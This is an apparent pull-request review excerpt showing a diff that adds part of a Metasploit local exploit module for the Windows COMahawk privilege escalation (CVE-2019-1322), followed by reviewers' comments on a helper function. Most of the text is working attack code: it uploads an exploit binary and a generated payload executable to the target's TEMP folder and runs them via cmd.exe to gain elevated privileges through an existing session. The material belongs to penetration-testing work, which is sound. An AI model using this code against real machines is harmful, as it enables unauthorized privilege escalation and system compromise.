modules/exploits/windows/local/comahawk.rb

```diff
@@ -0,0 +1,157 @@
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
+    ))
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host if (%RAND%.exe by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write binaries if (%TEMP% by default).', nil]),
+      OptInt.new('EXPLOIT_TIMEOUT',
+        [true, 'The number of seconds to wait for exploit to finish running', 60]),
+      OptInt.new('EXECUTE_DELAY',
+        [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+    ])
+  end
+
+  def exploit
+    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
+    payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
+    temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    payload_path = "#{temp_path}\\#{payload_name}"
+    exploit_path = "#{temp_path}\\#{exploit_name}"
+    payload_exe = generate_payload_exe
+
+    # Check target
+    vprint_status("Checking Target")
+    validate_active_host
+    validate_target
+    validate_remote_path(temp_path)
+
+    # Upload Exploit
+    vprint_status("Uploading Exploit")
+    ensure_clean_destination(exploit_path)
+    local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2019-1322', 'CVE-2019-1322-EXE.exe')
+    upload_file(exploit_path, local_exploit_path)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+
+    # Upload Payload
+    vprint_status("Uploading Payload")
+    ensure_clean_destination(payload_path)
+    write_file(payload_path, payload_exe)
+    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+
+    # Run Exploit
+    vprint_status("Running Exploit")
+    print_status("It may take a moment after the session is established for the exploit to exit safely.")
+    begin
+      cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
+    rescue Rex::TimeoutError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error("Caught timeout.  Exploit may be taking longer or it may have failed.")
+    end
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
```

Comment:
Could this be merged with `validate_target()` since it's just printing sysinfo information?

Reply:
I think this effectively calls `sysinfo` on the target host, testing the connection.  At least that was my assumption when I cargo culted it....

Reply:
Yeah, it's cargo cult code. Personally I think this code pattern is dumb, counter intuitive, and buggy. I have rambled as such here: #10691 without offering a better alternative.